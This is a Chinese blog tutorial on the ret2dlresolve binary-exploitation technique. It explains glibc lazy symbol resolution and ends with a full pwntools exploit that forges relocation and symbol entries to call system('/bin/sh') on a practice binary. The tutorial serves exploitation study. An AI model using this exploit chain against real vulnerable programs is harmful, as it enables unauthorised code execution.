ret2dlresolve(2)

最新推荐文章于 2024-02-06 12:20:21 发布
最新推荐文章于 2024-02-06 12:20:21 发布
阅读量136 收藏
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/F_Day_/article/details/120945987
版权

ret2dlresolve(2)

ret2dlresolve(1)中,关闭了Partial RELRO保护,因此能够对.dynamic进行修改,从而改变dynamic中dynstr的地址,通过伪造一个dynstr来实现将函数write链接到system函数
那么如果打开了Partial RELRO保护,将如何进行

代码还是之前的代码,通过如下方式进行编译

gcc -fno-stack-protector -m32 -z relro -z lazy -no-pie ../../main.c -o main_partial_relro_32

你也可以继续用关闭了Partial RELRO的程序,就当换个思路去执行system

dlresolve前后过程

在调用dl_runtime_resolve函数前,需要压入两个参数

  • reloc_arg,函数自己plt中push的内容,是该函数在.rel.plt的偏移
    在这里插入图片描述
  • link_map,公共plt表项,在plt开始push的参数
    在这里插入图片描述以setuf第一次调用为例
    在这里插入图片描述首先,第一个jmp会去判断函数是否已经有链接过,如果有就会到got表去执行,如果没有就向下执行
    push 0,就是传入dl_runtime_resolve的参数reloc_arg,接着跳转到plt开始处执行第二个push
    这里压入的就是参数link_map,压入的是一个地址
    在这里插入图片描述

通过link_map能够找到.dynamic的地址
在这里插入图片描述

这两个参数都可以控制,一是控制reloc_arg能够修改函数.rel.plt的位置执行自己伪造的值,二是控制link_map指向的地址,并在该地址处伪造数据,并将.dynstr的地址修改之后就和之前那篇文章一样了(第二种暂时还在测试中)

先来看修改reloc_arg的意义何在
还是上面的setbuf,他传入的reloc_arg是0,因此程序会在.rel.plt + 0处去寻找对应重定位表项
在这里插入图片描述得到两个值,第一个值是该函数got表地址,第二个值是.dynsym的偏移
通过定位到dynsym表项内容,能够找到这个函数的符号定义,也就是定位到.dynstr对应的位置。
在这里插入图片描述

关于这里的计算
1、根据reloc_arg定位到setbuf的重定位表0x8048330
setbuf重定位表项中804A00Ch, 107h这两个值,第二个0x107
0x107分两个部分,前一个字节也就是0111,应该是某种标志位,具体对应什么还不了解
后面两个字节00010000 -> 0x10就是在.dynsym中的偏移
2、之后根据偏移找到表项,其中有几个值,这里就看第一个的意义
offset aSetbuf - offset byte_8048278是对.dynstr中的偏移,0x33
3、通过偏移在.dynstr找到该函数的符号setbuf在这里插入图片描述

整体流程(来上大佬的图)
在这里插入图片描述

利用

到这里,目标就很明确了,修改reloc_arg指向自己定义的重定位表项,在重定位表项中修改动态符号表也就是.dynsym的偏移,使其能够指向自己定义的符号的地址

需要注意的是,要先进行栈迁移,如果直接在原栈上操作会出现很多莫名奇妙的问题,自己尝试不进行栈迁移,在测试修改动态符号表时,我输入的数据并没有到我期望的位置去,后来了解到是因为缓冲区大小不够的原因,导致后面写入的 数据跑到前面去了,所以还是要进行栈迁移。
至于迁移到那,就选一个可写,并且没被占用的位置就行

exp

from pwn import *
#context.log_level="debug"
context.arch="i386"
p = process("./main32")
rop = ROP("./main32")
elf = ELF("./main32")


p.recvline()

def debug():
	gdb.attach(p)
	pause()

offset = 92

rop.raw(offset*'a')
#栈迁移
base_addr = 0x0804a340
rop.read(0, base_addr, 100)
rop.migrate(base_addr)
p.sendline(rop.chain())

rop = ROP("./main32")

plt0 = elf.get_section_by_name('.plt').header.sh_addr
rel_plt = elf.get_section_by_name('.rel.plt').header.sh_addr
dynsym = elf.get_section_by_name('.dynsym').header.sh_addr
dynstr = elf.get_section_by_name('.dynstr').header.sh_addr


write_reloc_addr = base_addr + 24
write_dynsym_addr = write_reloc_addr + 0x10
system_addr = write_dynsym_addr + 0x10
print(hex(dynsym))
print(hex(write_dynsym_addr))

write_reloc = flat([0x804A01C, (((write_dynsym_addr - dynsym) & 0xfff0) << 4) + 7])
#write_reloc = flat([0x804A01C, 0x607])
print(hex((((write_dynsym_addr - dynstr) & 0xfff0) << 4) + 7))
write_dynsym = flat([system_addr + 0x8 - dynstr, 0, 0, 0x12])
#write_dynsym = flat([0x4c, 0, 0, 0x12])
print("write_dynsym:" + hex(write_dynsym_addr))
print("system_addr:" + hex(system_addr))

rop.raw(plt0) #4
rop.raw(write_reloc_addr - rel_plt)
rop.raw(elf.sym['main']) 
rop.raw(system_addr)
rop.raw(1)
rop.raw(1)
rop.raw(write_reloc)
rop.raw('a' * 8)
rop.raw(write_dynsym)
print(system_addr - base_addr)
print(len(rop.chain()))
rop.raw('/bin/sh\x00')
rop.raw('system\x00')
p.sendline(rop.chain())

p.interactive()
F_D。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2dl-resolve
fa1c4的blog
04-19 332
最早是2015年在一篇论文中提出的攻击技术. How the ELF Ruined Christmas 因为通常漏洞利用包含两个阶段 信息泄露, 得知内存布局 通过已知内存布局, 利用漏洞 但由于不是常常能够得知内存信息, 所以ret2dl-resolve是一种仅仅利用ELF文件格式和动态装载器弱点进行漏洞利用的方法. 符号解析图示 .rel.plt段由Elf_Rel结构体构成 Elf_Rel结构体 struct Elf32_Rel { Elf32_Addr r_offset; // Loca
ret2dlresolve(4)
F_Day_的博客
11-15 2335
ret2dlresolve(4) 这次是64位下,开了Partial RELRO保护 这次记录自己的解题过程 先测试一下传入自己构造的reloc_arg看看程序能不能正常运行 elf = ELF('./main64') def debug(): gdb.attach(p) pause() def csu(r12, r13, r14, r15, ret): rbx = 0 rbp = 1 payload = p64(0x400766) payload += p64(1) + p64(rbx
ret2dlresolve,ret2srop
最新发布
2302_79813730的博客
02-06 1003
那么如果我们可以控制相应的参数及其对应地址的内容是不是就可以控制解析的函数了呢?没有一个函数,也不是我们经常利用的read,write函数,这里只有一次发送机会,但我们要发送两次,第一次先将返回地址再改成vuln函数,第二次发送我们的rop链。主要是2,这个过程会rt_sigreturn函数进行还原,而且是根据栈中内容去还原,之后我们可以利用工具去伪造我们想要rop链。一般,我们也称其为软中断信号,或者软中断。首先,32位的 标志特别突出,只有read函数能栈溢出。的机制,我们可以构造一个假的。
pwn-ret2dl-resolve
CharlesGodX的博客
05-04 523
pwn-ret2dl-resolve 0x00:漏洞介绍 ret2dl-resovle这种技术在pwn中的运用也挺多的,可以类比Windows下的IAT技术进行学习,了解这个技术之前,我们需要知道ELF文件中各个函数的加载过程,下面就演示一下GOT表是如何加载的,首先我们编译一个简单的程序 #include <stdio.h> int main() { puts("Hello ...
pwn学习】- ret2dlresolve
Morphy_Amo的博客
04-12 3580
ret2dlreslove
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc exploit
07-07
### Return-to-libc (ret2libc) Exploit详解 #### 引言 在深入探讨Return-to-libc(简称ret2libc)技术之前,我们先简要回顾一下这一领域的背景知识。随着网络安全领域的不断发展,攻击者与防御者的对抗也在不断...
Performing a ret2libc Attack-InVoLuNTaRy
04-24
### 执行ret2libc攻击——InVoLuNTaRy #### 一、ret2libc攻击简介 **ret2libc**(返回到libc或返回到C库)是一种攻击技术,它允许攻击者在无需注入shellcode的情况下控制目标系统中的易受攻击进程。这种攻击方式...
Jetson TX2 GPIO端口控制程序
05-24
2. **设置GPIO**: - 使用`libgpiod`,你可以通过`gpioset`命令行工具或编程接口来配置GPIO。例如,`gpioset`命令可以设置GPIO的方向(输入或输出)、初始值以及边缘检测(上升沿或下降沿)。 - `wiringPi`库提供...
2d动画系统教程
03-14
RETAS PRO 的安装 与 教程 先再大至介绍一下RTEAS吧。他是日本Celsys株式会社开发的一套应用于普通PC和苹果机的专业二维动画制作系统,全称为Revolutionary Engineering Total Animation System。 它主要由四大部分...
ret2dlresolve(32位)
qq_45595732的博客
03-03 221
穿插例题XDCTF2015 bof ELF程序的基本相关结构 节区中包含目标文件的所有信息。节的相关结构体。 typedef struct { Elf32_Word sh_name; /* Section name (string tbl index) 节区头部字符串节区的索引*/ Elf32_Word sh_type; /* Section type 节区类型*/ Elf32_Word sh_flags; /* Section flags 节区标志,用于描述属性*/ Elf32_
栈溢出之ret2dlresolve
zyxx_wjc的博客
05-07 823
三月份在buuctf上举办的DASCTF上有一道“简单"的栈题——checkin,然而我这个菜鸡拿到题之后直接麻爪了——没有输出咋泄露libc啊(这个Jmp.Cliff他就是逊啦......)......后来学长告诉我,有个技巧叫ret2dlresolve,可以处理这种没有输出的情况,自知基础不牢的我老老实实回到CTF wiki上找到了这个技巧,又参考了网上很多大佬的博客,啃了几天,总算是啃明白了。这两天国赛临近,正积极备赛,突然想到这个有些生疏的知识还未整理,就写个博客记录一下吧。 本文主要围绕64位下
Ret2dlresolvePayload使用
qq_45595732的博客
03-05 892
对于Ret2dlresolve,payload构造特别麻烦,但pwntools有相应的工具,其payload构造可以由Ret2dlresolvePayload来完成。(真香) help(pwnlib.rop.ret2dlresolve.Ret2dlresolvePayload) Help on class Ret2dlresolvePayload in module pwnlib.rop.ret2dlresolve: class Ret2dlresolvePayload(__builtin__.objec
ret2dlresolve归纳
am_03的博客
09-02 264
ret2dl_resolve的原理: 动态链接相关函数_dl_runtime_resolve(link_map_obj, reloc_index) 功能:在第一次调用某函数时运行,绑定其地址到对应的GOT表项 第一个参数link_map_obj一直为GOT[1]的地址 第二个参数reloc_index为被绑定函数在.rel.plt段里的相对偏移 原理: 1.调用_dl_runtime_resolve,修改reloc_index,令其指向伪造在栈里的重定向表表项 2.- 伪造重定向表表项,修改第二项里符号表索
ret2dl_resolve 知识点总结
qq_43189757的博客
07-11 403
ret2dl-resole 是通过伪造到 .rel.plt , .dynsym, .dynstr中表项中的偏移以及伪造这三个段中的数据结构来达到调用system 函数的目的 这三个段的信息都可以在IDA中 DYNAMIC 段中找到 DT_STRTAB -> .dynstr DT_SYMTAB -> .dynsym DT_JMPREL -> .rel.plt...
PWN入门之栈溢出之ret2dlresolve
weixin_44681716的博客
05-03 1023
实验目的 当一个程序第一次调用libc中的函数时,必须首先对libc中函数的真实地址进行重定位,而这个绑定寻找真实地址的过程由dl_runtime_resolve完成。 dl_runtime_resolve需要两个参数,一个是link_map=*(GOT[1]),即链接器标志信息和reloc_arg(标志该函数重定位入口偏移),我们需要做的就是控制reloc_arg从而使dl_runtime_re...
ret2dlresolve超详细教程(x86&x64)
qq_51868336的博客
03-10 4947
X86 前置知识 在Linux中,程序使用_dl_runtime_resolve(link_map,reloc_offset)来对动态链接的函数进行重定位。 而ret2dlresolve攻击的核心就是控制相应的参数及其对应地址的内容,从而控制解析的函数。 延迟绑定 第一次调用一个函数时,先是到plt表,然后jmp到got表 此时got表存的地址是在plt表上 其实也就是jmp got的下一条指令,这里先是push一个数字(该函数在rel.plt上的偏移,reloc_arg,后文会讲到),然后jmp到pl
栈溢出利用之return to dl-resolve payload 构造原理(二)
M021的专栏
11-03 2084
return to dl-resolve payload构造原理
栈溢出利用之return to dl-resolve实例
M021的专栏
10-07 3519
最近学习了一下漏洞原理与利用,学习到栈溢出漏洞利用的一些技巧,记录下自己的学习心得。关于return to dl-resolve的原理,网上有许多的文章已经写的很清楚了,就不赘述。本文主要是根据return to dl-resolve的原理,实现32位和64位环境下的漏洞利用。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值